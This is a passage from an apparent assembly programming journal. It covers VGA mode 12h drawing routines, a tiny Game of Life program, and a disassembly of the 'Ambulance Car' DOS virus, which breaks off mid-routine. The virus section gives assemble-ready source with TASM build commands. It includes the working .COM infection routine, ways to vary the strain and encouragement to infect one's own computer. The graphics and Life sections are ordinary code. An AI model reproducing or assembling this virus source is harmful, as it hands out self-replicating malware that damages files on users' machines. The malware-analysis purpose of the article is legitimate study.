In Mode 013 you just can load a bytevalue colour into a memory location and
that's it. So that's an ultrafast resolution, but at the price of resolution.

In Mode 012 we define colour with a series of I/O instructions. If a colour
got set, it remains active until canceled by another SetColr call. Try to
remember this when all on a sudden all kinds of fancy colours start to appear
on screen....


Where to put the pixel?
-----------------------
I have presented the formula some paragrpahs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:

    ------------------ VGA memory address ---------------- Start -------
    VGaddr:                            ; calculate address in VGA memory
             mov   es, [VGA_base]    ; quickly load segment register
             mov   ax, [di.CurrY]    ; ax = current Y
             add   ax, [di.Win_Y]    ; adjust for window offset
             call  [di.Multiply]    ; multiply by bytes per row
             mov   bx, [di.CurrX]    ; bx = current X
             add   bx, [di.Win_X]    ; adjust for window offset
             shr   bx, 3            ; divide by 8
             add   bx, ax            ; bx = index address into video segment
             ret
    ------------------ VGA memory address ----------------- End --------

It's all fairly straightforward.


How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either believe me on my word, or consult a 1200
page reference....

Now that we're ready to plot pixels, we do so by the following code:

    ------------------ VgaPlot -------------------- Start --------------
    VgaPlot: mov   al, [es:bx]        ;  Do the actual plotting
             mov   al, [ToPlot]
             mov   [es:bx], al
             ret
    ------------------ VgaPlot --------------------- End ---------------

The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte. The resulting data from the read is of no concern.
We immediately replace it with the value of "ToPlot". For plotting there is a
value of "FF" in this byte and for erasing there is a "00" in it.

After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask.

Adding it all up gives the following code to really plot a pixel:

    -------- PlotPix ------------------------------- Start -----------
    PlotPix: push  ax, bx, cx, es    ; plot a point on screen
             call  VGaddr
             mov   cx, [di.CurrX]    ; calculate plottingmask
             add   cx, [di.Win_X]
             and   cx, 0111xB        ; cl = position in byte
             mov   ah, 080
             shr   ah, cl            ; now move the high bit backwards...
             call  SetMask            ; use it to set mask
             call  VgaPlot            ; and do the plotting
             pop   es, cx, bx, ax
             ret
    -------- PlotPix -------------------------------- End ------------

That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. The msjority of this procedure is comprised of the way to find the
actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need
bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.

             mov   cx, [di.CurrX]    ; calculate plottingmask
             add   cx, [di.Win_X]
             and   cx, 0111xB        ; cl = position in byte

At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:

             mov   ah, 080
             shr   ah, cl            ; now move the high bit backwards...

I don't know if there are batches of Intel CPU's that have a problem with the
SHR instruction is CL equals zero, but I have not yet noticed any.


Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).

Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels mainly are in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as much byte writes as possible.


Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:

    First        1        2       3 ... K      Last      ; byte in video memory
   ......## ######## ######## ###...### ###.....  ; # = pixel to be set

So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.

    First        1        2       3 ... K      Last      ; byte in video memory
   ......## ######## ######## ###...### ###.....  ; # = pixel to be set

We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:

    E-val = 8 - ((CurrX + Win_X) AND 7)

Now we know the number of pixels to plot in the very first VGA memory
location. It would however come in handy if we would know with which plotting
mask this would correspond. That's why we use it to derive the E-mask:

   E-mask = FF shr ((8 - E-val) AND 7)

Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:

    L-val = (Total - E-val) AND 7
   L-mask = 080 sar L-val

With the SAR we shift signbits to the right until the number of pixels
corresponds with the number of bits in the mask.

The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:

    K-val = (T - E-val - L-val)/8

Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.

There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:

  E-val = 2                                        E-mask = 00000011
  L-val = (26 - 2) AND 7 = 24 AND 7 = 0            L-mask = 00000000
  K-val = (26 - 2 - 0)/8 = 3

So, if the line ends on a byte boundary, we may NOT try to plot <A LOT> of
pixels past it (in a plotting loop that starts with CX = 0).

What the H_line procedure does is no more than what I decribed above. Here
comes the source:

    -------- H_Line -------------------------------- Start -----------
    L0:         mov   cx, [di.DeltaX]        ; do a short line
    L1:         call  PlotPix                ; by just repeating a single pixel-
             inc   [di.CurrX]            ; plot and update of CurrX
             loop  L1                    ; until done
             pop   es, cx, bx, ax
             ret

    H_Line:     push  ax, bx, cx, es        ; optimized horizontal line drawing
             cmp   [di.DeltaX], 17        ; too few pixels for a bulk draw?
             jb       L0
             mov   cx, [di.CurrX]        ; do a long line
             add   cx, [di.Win_X]        ; first get the E-value as described
             and   cx, 0111xB            ;    above
             mov   bx, 8
             sub   bx, cx
             mov   [E_val], bx            ; pixels to plot in leftmost byte
             mov   al, 0FF                ; now compose the mask to use there
             shr   al, cl
             mov   [E_mask], al            ; and store it in memory
             mov   cx, [di.DeltaX]        ; CX = length of line
             sub   cx, [E_val]            ; compensate for first-byte pixels
             mov   ax, cx
             and   ax, 0111xB            ; this many pixels in rigthmost byte
             mov   [L_val], ax            ; and store it in memory
             sub   cx, ax                ; CX = number of pixels inbetween
             shr   cx, 3                ; divide by 8 pixels per byte
             mov   [K_val], cx            ; number of "full" bytes to plot
             clr   al                    ; AL := 0
             mov   cx, [L_val]            ; prepare to compose L-mask
             cmp   cx, 0                ; any bits in "last byte"
             IF ne mov    al, bit 7        ; if any bits, setup AH register
             dec   cx                    ; compensate for pixel 0, ...
             sar   al, cl                ; ... compose plotting mask and ...
             mov   [L_mask], al            ; ... store it into memory.
                                        ; that's it. Let's plot!
             call  VGaddr                ; load BX with address of byte in
                                        ; VGA memory
             mov   ah, [E_mask]
             call  SetMask                ; set plotting mask and ...
             call  VgaPlot                ; ... plot leftmost part
             inc   bx                    ; get adjacent address
             mov   cx, [K_val]            ; prepare for bulk-filling
             jcxz  >L4                    ; if nothing to do, jump out
             mov   ah, 0FF                ; else set ALL PIXELS mask
             call  SetMask
    L3:         call  VgaPlot                ; plot middle part
             inc   bx
             loop  L3                    ; until done
    L4:         mov   ah, [L_mask]
             call  SetMask
             call  VgaPlot                ; plot remaining pixels
             mov   ax, [di.DeltaX]
             add   [di.CurrX], ax        ; make sure CurrX is updated
             pop   es, cx, bx, ax        ; and git outa'here
             ret
    -------- H_Line --------------------------------- End ------------

The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.


Vertical lines.
---------------
Vertical lines are simply plot by repeatedly calling PlotPix. It's so simple
that neither need nor want to elaborate on it:

    -------- VertLin ------------------------------- Start -----------
    VertLin: push  cx                    ; draw a vertical line
             mov   cx, [di.DeltaY]
    L0:         call  PlotPix
             inc   [di.CurrY]            ; adjust Y coordinate
             loop  L0                    ; but not X value!
             pop   cx
             ret
    -------- VertLin -------------------------------- End ------------


What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.


Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.

I use a 9 x 16 character set. The nineth bit is just always blank, but it
enhances readability considerably. The pixels in the bitmap are all 8 bits
wide and 16 pixels tall.

In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the time this will not be the case. Therefore I do the following:

 - do some positioning math first
 - repeat 16 times:
   - load the byte of the bitmap in AH
   - shift AX to the right the correct number of pixels
   - plot the AH part
 - if plotting on a byte boundary, we're done, else
   - repeat 16 times:
     - load the byte of the bitmap in AH
     - shift AX to the right the correct number of pixels
     - plot the AL part

Let's just have a look:

    -------- PutChar ------------------------------- Start -----------
    L0:         add   [di.CurrY], 16        ; process 'LF'
    L1:         pop   es, si, cx, bx
             ret

    L2:         mov   bx, [di.Indent]        ; process 'CR'
             mov   [di.CurrX], bx
             jmp   L1

    PutChar: push  bx, cx, si, es        ; print char in al at (x,y)
             cmp   al, lf
             je       L0
             cmp   al, cr
             je       L2

             mov   bx, [di.CurrX]
             add   bx, CHR_WID
             cmp   bx, [di.Win_wid]        ; still safe to print character?
             jbe   >L3                    ; if so, skip over this part
             mov   bx, [di.Indent]
             mov   [di.CurrX], bx        ; mimick 'CR'
             add   [di.CurrY], 16        ; mimick 'LF'

    L3:         mov   cx, [di.CurrX]
             add   cx, [di.Win_X]
             and   cx, 0111xB
             mov   [C_val], cl            ; store shiftcount for masks
             mov   bx, 0FF00
             shr   bx, cl                ; setup plotting mask and ...
             mov   [P_mask], bx            ;      ... store it
             clr   ah                    ; ax = ASCII code
             mov   si, ax                ; make address of pixels in bitmap
             shl   si, 4
             add   si, offset bitmap
             call  VGaddr                ; bx = -> in video memory
             mov   ax, [P_mask]            ; only the AH part is used ...
             call  SetMask                ; ... here.
             mov   cx, 16                ; 16 pixel lines per token
    L4:         push  cx                    ; we're in the loop now
             mov   ah, [si]                ; AH = pixelpattern
             clr   al                    ; AL = empty
             mov   cl, [C_val]            ; get shiftcount
             shr   ax, cl                ; distribute pixelBYTE across a WORD
             mov   cl, [es:bx]            ; dummy read, CL is expendable
             mov   [es:bx], ah            ; actual plotting of this half
             add   bx, 80                ; point to next pixelbyte address
             inc   si                    ; next pixeldata address
             pop   cx
             loop  L4                    ; and loop back

             sub   bx, 16 * 80 - 1        ; back to original position
             mov   ax, [P_mask]
             cmp   al, 0                ; if nothing to do, ...
             je       >L6                    ; ... skip this chapter
             mov   ah, al                ; else repeat the lot for the right-
             call  SetMask                ; most pixels....
             mov   cx, 16
             sub   si, cx                ; correct SI
    L5:         push  cx
             mov   ah, [si]
             clr   al
             mov   cl, [C_val]
             shr   ax, cl
             mov   cl, [es:bx]
             mov   [es:bx], al
             add   bx, 80
             inc   si
             pop   cx
             loop  L5
    L6:         add   [di.CurrX], CHR_WID    ; adjust CurrX value before ...
             jmp   L1                    ; ... getting a hike
    -------- PutChar -------------------------------- End ------------

So far for plotting text. This routine will dump any character in any place of
the graphics screen. But it needs a CurrX and a CurrY value to know where to
plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
elaborately specify CurrX and CurrY before the text is where we would like to
have it.

That's why I made the constrcut with the Topic and TopicEnd macro's, as
described above.

Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.

    -------- Print --------------------------------- Start -----------
    print:     mov   ah, [di.TxtCol]        ; print a table of text
             call  SetColr
    L0:         lodsw                        ; get Xpos
             cmp   ax, 0F000            ; end of table?
             je       ret                    ; exit, if so
             mov   [di.CurrX], ax
             lodsw                        ; get Ypos
             mov   [di.CurrY], ax
    L1:         lodsb                        ; get text
             cmp   al, 0
             je       L0
             call  putchar                ; and print it
             jmp   L1                    ; until this line is done
    -------- Print ---------------------------------- End ------------

Wit this approach, and starting from a working (empty) framework of routines,
you can design the userinterface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....

Having such routines, which have been tested and found reliable, you make the
user interface easily and are able to concentrate on the actual coding the
maximum amount of time. If the screen needs another layout (since you couldn't
realize the function you considered), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.


Conclusion.
-----------
So far my elaboration on the VGA mode 12h. Again, I would rather use 800 x 600
but that mode is not standardised. VGA 12h is standard on all VGA cards, so
it's the best we can universally get and for many applications it is more than
enough.

Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice to control many applications. If the
screen is well layed out, you don't need the keyboard for data entry. Just drag
the mouse along the screen and poke him in the eye.


The bitmap data for the character generator can be obtained from
          http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                          Conway's Game of Life
                                                              by Laura Fairhead


    I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!

    Life is a classic game of cellular automata by John Conway. It is
played on an nxn grid of squares. Each square may be occuppied by a
cell or empty. Each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-

(i)        a cell with less than 2 or more than 3 neighbours dies
(ii)    a cell with 2 or 3 neighbours survives
(iii)    a cell is born in a square with exactly 3 neighbours

    A neighbouring square is one diagonally adjacent as well as the
normal horizontal/vertical so each square has 8 neighbouring squares.


Overview of the code
~~~~~~~~~~~~~~~~~~~~

First, note that if we define

        S:=state of square in this generation (0=empty, 1=occupied)
        N:=number of neighbours
       S':=state of square in the next generation

then according to the rules

        S'={0, if N<2 or N>3
           {1, if (N=2 or N=3) and S=1
           {1, if N=3

so S'=1 iff (N=2 and S=1) or N=3

this can be simplified using bitwise-OR to the dramatically simple:

            S'= ( N|S=3 )

note: iff means "if and only if"

      "A iff B" means that A => B and B => A


    The code uses one big array with one byte for each square that
starts just after the program end. To save space it just assumes that it
can use this memory since this is generally okay. However this is
very bad practice really and it should use AH=04Ah/int 021h to adjust
the memory size and abort if not successful.

    The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.

    After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.

    Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down. Therefore:-

    -0141h -0140h -013Fh

    -0001h      .      +0001h

    +013Fh +0140h +0141h

    If DI is the offset of the array which we are calculating for,
note that the neighbours can be summed as follows:-

    MOV AX,[DI-0141h]
    ADD AL,[DI-013Fh]
    ADD AX,[DI+013Fh]
    ADD AL,[DI+0141h]
    ADD AL,[DI-1]
    ADD AL,[DI+1]
    ADD AL,AH

    Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.

    So from here the new cell state can be calculated simply:-

    OR AL,[DI]
    AND AL,0Fh

    CMP AL,3

    And if ZF=1 now we have a set cell.

    JNZ ko
    OR BYTE PTR [DI],010h
ko:


    When the next generation has been calculated we have done most of
the work. The only thing is that if we want to iterate we need all
of those bit4 's moved to bit0, also we want to display the next
generation, this can be done easily at the same time.

    Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....


    The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).


===========START OF CODE===================================================

OPTION SEGMENT:USE16
.386

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
        MOV SP,0100h

        MOV AX,013h
        INT 010h

;
;use current time as random number seed
;in BP,DX which is used later
;
        MOV AH,02Ch
        INT 021h
        MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
        MOV AX,DS
        ADD AX,01Ah                ;(OFFSET endofprog+0Fh>>4)=(1A)
        MOV ES,AX
        MOV AX,0A000h
        MOV DS,AX

;
;CREATE GENERATION#0
;  this is done by filling approx 1/4 of the cells in the array
;  'randomly', while taking care not to fill any edge cells
;

;
;blank the array
;  this is done to ensure the edge cells are clear
;
        XOR DI,DI
        MOV CX,0FA00h
        REP STOSB

;
;fill the array
;  two nested loops, CL counts the rows, SI counts the columns
;  this is so that after each row DI can be bumped past the edge
;
        MOV CL,0C6h
        MOV DI,0141h            ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
        MOV BX,DI

lopr0:    MOV SI,-013Eh

;
;iterate random number seed in BP,DX
;
lopr:    LEA AX,[BP+DI]
        ROR BP,3
        XOR BP,DX
        SUB DX,AX
;
;set cell with probability 1/4
;
        CMP AL,0C0h
        SBB AL,AL
        INC AX
        STOSB
;
;
        INC SI
        JNZ lopr

        SCASW                    ;DI+=2, skipping edge

        LOOP lopr0

;
;now we set DS=array, ES=screen. this doesn't change until exit
;
        PUSH ES
        PUSH DS
        POP ES
        POP DS                    ;DS=vseg,ES=0A000h throughout

;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
        MOV DI,BX                ;DI=0141h

;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;

lopy:    MOV SI,013Eh

;
;'lopx' is the loop for columns, SI holds the count
;

;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx:    MOV AX,[DI-0141h]
        ADD AL,[DI-013Fh]
        ADD AX,[DI+BX-2]
        ADD AL,[DI+BX]
        ADD AL,[DI-1]
        ADD AL,[DI+1]
        ADD AL,AH
;
;calculate new cell state
;
        OR AL,[DI]
        AND AL,0Fh
        CMP AL,3
        JNZ SHORT ko
        OR BYTE PTR [DI],010h

ko:        INC DI

        DEC SI
        JNZ lopx

;
;(each row we miss 2 edge cells)
;
        SCASW
        CMP DI,0FA00h-013Fh
        JC lopy

;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
        MOV CX,03E80h
        XOR DI,DI

lopc:    LODSD
        SHR EAX,4
        AND EAX,01010101h
        MOV [SI-4],EAX
        STOSD
        LOOP lopc

;
;USER KEYPRESS?
;
        MOV AH,0Bh
        INT 021h
        ADD AL,3
;
;no, back for next generation
;
        JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
        CBW
        INT 010h
;
;back to DOS
;
        MOV AH,04Ch
        INT 021h

kode ENDP

endof EQU $

cseg ENDS

END FAR PTR kode


===========END OF CODE=====================================================


    While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remidied by the addition of a wait
for vertical synchronisation loop (or vert sync as we techies call it).

    Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-

        MOV DX,03DAh

lopv0:    IN AL,DX
        AND AL,8
        JNZ lopv0

lopv1:    IN AL,DX
        AND AL,8
        JZ lopv1

    Also if you add this the program size has changed. 'endofprog' is now
01ABh, so the number of segments to add to DS to get the start of free space
is now 01Bh. You must change the instruction at the beginning of the code:-

        MOV AX,DS
**        ADD AX,01Bh                ;(OFFSET endofprog+0Fh>>4)=(1B) **
        MOV ES,AX


    One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it reads the memory at ES:[DI]. Generally this
is fine but if DI=0FFFFh we will get a general protection fault.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    'Ambulance Car' Disassembly
                                                    by Chili


This virus    has definitely    my    favourite  payload of  all times.  I just  love
seeing that little    ambulance run  across the screen with  a 'siren' playing at
the same time.    Other than that, the virus itself isn't much of a thing.  Don't
forget though, that it is dated back to at least 1990.

It is a non-resident  .COM infector,  and each time an    infected file is run it
will attempt to     infect     two files    (be it    in the    current     directory    or in a
directory  located in  the PATH)  in a parasitic  manner.  Infected files  will
experience a 796 bytes growth, being the main virus body appended to the end of
the host. Also the host file's date and time will be preserved.     On ocasion the
virus will display the 'ambulance car' payload.

The     virus doesn't    preserve the initial  contents of  AX and so  programs like
HotDIR fail to run when infected.  Also if there is any     reference to 'PATH' in
the environment block before  the actual PATH string the virus will assume that
to be the actual PATH (i.e. 'CLASSPATH=...').


Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things.     Also if all you want to do
is see the payload,     then comment the following lines in the source code (right
after the delta offset calculation) so that no files are infected:

                call    search_n_infect
                call    search_n_infect

Moreover you should comment the lines presented below (for the 'RedXAny' strain
look-alike) so that the payload is shown everytime the virus is run.

In case     things start to  get out of hand,    you should do  one of three things:
either disinfect the files yourself with an hex editor,     use the latest version
of F-PROT  (available from ftp.complex.is or through Simtel and Garbo)    to scan
and clean the infected files or use my own disinfector    (in another article) to
clean this specific strain.

[NOTE: F-PROT  will     report     the  strain  whose     source     code is  presented     as
       Ambulance.796.D]

Keep in mind that  this virus is not destructive,  so feel free to go ahead and
infect your entire computer (you really shouldn't do this,    since accidents can
sometimes happen!).


Strains
-------
A  'RedXAny'  strain look-alike     can be     obatined  by commenting  the following
lines (both in the 'payload' procedure):

                jne        exit_payload            ;  (starting  with    the     sixth)

                jnz        exit_payload            ;  don't show payload

[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
       in the same manner - always shows the ambulance car]

Other strains exist,  but will not be  discussed here,    has nothing of interest
would be added.


Compatibility
-------------
The virus runs ok in a Win95's DOS box.     Also, remember that for the payload to
be apreciated in full, a PC Speaker is required.  Bad luck for those of you who
don't have a computer with one...


Here is the disassembly:

--8<---------------------------------------------------------------------------

; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
;        tasm /ml /m2 ambul-b.asm
;        tlink /t ambul-b.obj


PSP_environment_seg        equ        2Ch        ; PSP location of process'    environment
                                        ;  block segment address

BDA_addr                equ        40h        ; BDA (Bios Data Area) segment address

BDA_LPT3_port_addr        equ        0Ch        ; BDA  location of    LPT3 I/O port  base
                                        ;  address
BDA_video_mode            equ        49h        ; BDA location of current video mode
BDA_timer_counter        equ        6Ch        ; BDA location of number of timer ticks
                                        ;  (18.2 per second) since midnight


_TEXT            segment word public 'code'
                assume    cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                org        100h

; Host and virus' main body
;--------------------------
ambulance_car    proc    far

; Jump over host to real beginning of virus

                db        0E9h, 01h, 00h    ; Harcoded relative near jump

; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here

host:
                nop

; Calculate the delta offset
;
; This piece of code  will 'fool' some disassemblers and so it will     appear as:
;
;        call    $+4
;        add        [bp-7Fh], bx
;        out        dx, al
;        add        ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h';     used since     the near jump    above is also  3 bytes long
;  and that has to be taken into account for the displacement calculation)

real_start:
                call    find_displacement
                db        01h                ; Used to make this add up to 3 bytes
find_displacement:
                pop        si
                sub        si, offset host

; Infect twice then load up the payload

                call    search_n_infect
                call    search_n_infect
                call    payload

; Restore host's original first 3 bytes

                lea        bx, [si+original_3bytes-4]
                mov        di, offset ambulance_car
                mov        al, [bx]
                mov        [di], al        ; Restore 1st byte
                mov        ax, [bx+1]
                mov        [di+1], ax        ; Restore 2nd and 3rd bytes

; Return control to host

                jmp        di

; Move on to next step (be it 'search_n_infect' or 'payload')

next_step:
                retn

ambulance_car    endp


; Search for a file and infect it
;--------------------------------
search_n_infect proc    near

; Search for the file

                call    search

; Found any file?

                mov        al, byte ptr [si+file_mask-4]
                or        al, al                    ; If not,  then move  on to the
                jz        next_step                ;  next step

; Increase 'opened files' counter

                lea        bx, [si+counter-4]
                inc        word ptr [bx]

; Open file in read/write mode (AL - 02h)

                lea        dx, [si+filename-4]        ; Open a File
                mov        ax, 3D02h                ;  [on entry AL     -    Open  mode;
                int        21h                        ;    DS:DX - Pointer to filename
                                                ;    (ASCIIZ string)]
                                                ;  [returns AX - File handle]

; Save file handle

                mov        word ptr [si+file_handle-4], ax

; Read file's first 3 bytes

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3                    ; Read    from  File    or    Device,
                lea        dx, [si+first_3bytes-4] ;  Using a Handle
                mov        ah, 3Fh                    ;  [on entry BX -  File handle;
                int        21h                        ;    CX    -  Number  of bytes     to
                                                ;    read;  DS:DX  -     Address of
                                                ;    buffer]

; Check if already infected

                mov        al, byte ptr [si+first_3bytes-4]
                cmp        al, 0E9h                ; Is first byte a near jump?
                jne        infect                    ; If not,  assume  virus  isn't
                                                ;  here, so go ahead and infect

; Move file pointer to real virus start (pointed to by the initial near jump)

                mov        dx, word ptr [si+first_3bytes+1-4]
                mov        bx, word ptr [si+file_handle-4]
                add        dx, 3                    ; Add  3 bytes    to account    for
                                                ;  the near jump
                xor        cx, cx                    ; Move File Pointer (LSEEK)
                mov        ax, 4200h                ;  [on entry BX -  File handle;
                int        21h                        ;    CX:DX -     Offset,  in bytes;
                                                ;    AL     -     Mode  code     ( Move
                                                ;    pointer     CX:DX    bytes  from
                                                ;    beginning of file, AL - 0)]

; Read first 6 bytes from that location

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 6
                lea        dx, [si+six_bytes-4]
                mov        ah, 3Fh                    ; Read    from  File    or    Device,
                int        21h                        ;  Using a Handle

; Double-check if already infected
;
; Compares the bytes read  with the first part of the  displacement calculation
;  code

                mov        ax, word ptr [si+six_bytes-4]
                mov        bx, word ptr [si+six_bytes+2-4]
                mov        cx, word ptr [si+six_bytes+4-4]
                cmp        ax, word ptr [si+ambulance_car]
                jne        infect
                cmp        bx, word ptr [si+ambulance_car+2]
                jne        infect
                cmp        cx, word ptr [si+ambulance_car+4]
                je        close_file                ; If already infected,    then go
                                                ;  ahead and close the file

infect:

; Reset file pointer to end of file (AL - 2)

                mov        bx, word ptr [si+file_handle-4]
                xor        cx, cx
                xor        dx, dx                    ; Move File Pointer (LSEEK)
                mov        ax, 4202h                ;  [returns DX:AX - New pointer
                int        21h                        ;    location]

; Calculate virus' near jump relative offset

                sub        ax, 3                    ; Account for the near jump
                mov        word ptr [si+relative_offset-4], ax

; Get and save file's date and time (AL - 0)

                mov        bx, word ptr [si+file_handle-4]
                mov        ax, 5700h                ; Get a File's Date and Time
                int        21h                        ;  [on entry BX - File handle]
                push    cx                        ;  [returns     CX     -    Time;  DX -
                push    dx                        ;    Date]

; Write virus body to end of file

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, virus_body - real_start
                lea        dx, [si+ambulance_car]    ; Write to    a File    or    Device,
                mov        ah, 40h                    ;  Using a Handle
                int        21h                        ;  [on entry BX     - File handle;
                                                ;    CX    -  Number  of  bytes to
                                                ;    write;    DS:DX  - Address of
                                                ;    buffer]

; Write host's first 3 bytes to after virus body

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3
                lea        dx, [si+first_3bytes-4]
                mov        ah, 40h                    ; Write to    a File    or    Device,
                int        21h                        ;  Using a Handle

; Move file pointer to beginning of file

                mov        bx, word ptr [si+file_handle-4]
                xor        cx, cx
                xor        dx, dx
                mov        ax, 4200h                ; Move File Pointer (LSEEK)
                int        21h

; Write jump-to-virus-body code to beginning of file

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3
                lea        dx, [si+jump_code-4]
                mov        ah, 40h                    ; Write to    a File    or    Device,
                int        21h                        ;  Using a Handle

; Reset file's date and time to previous (AL - 1)

                pop        dx
                pop        cx
                mov        bx, word ptr [si+file_handle-4]
                mov        ax, 5701h                ; Set a File's Date and Time
                int        21h                        ;  [on entry BX     - File handle;
                                                ;    CX - Time; DX - Date]

close_file:
                mov        bx, word ptr [si+file_handle-4]
                mov        ah, 3Eh                    ; Close a File Handle
                int        21h                        ;  [on entry BX - File handle]

                retn

search_n_infect endp


; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search            proc    near

                mov        ax, ds:PSP_environment_seg
                mov        es, ax

                push    ds
                mov        ax, BDA_addr
                mov        ds, ax
                mov        bp, ds:BDA_timer_counter
                pop        ds

; Where to infect
;
; Probability of  infecting in the    current directory  (none of     the first    two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for a directory where to infect (one or both of the first two lower
;  bits of BP being set) is 3/4 (75%)

                test    bp, 00000011b            ; Check if we are  to infect in
                jz        check_cur_dir            ;  the current    directory or in
                                                ;  a PATH directory

; Find the PATH string in the environment block
;
; Format of environment block (from Ralph Brown's Interrupt List):
;
; Offset  Size      Description
; ------  ----      -----------
; 00h      N BYTEs first environment variable, ASCIIZ string of form "var=value"
;          N BYTEs second environment variable, ASCIIZ string
;            ...
;          N BYTEs last environment variable, ASCIIZ string of form "var=value"
;            BYTE  00h
;---DOS 3.0+ ---
;            WORD  number of strings following environment (normally 1)
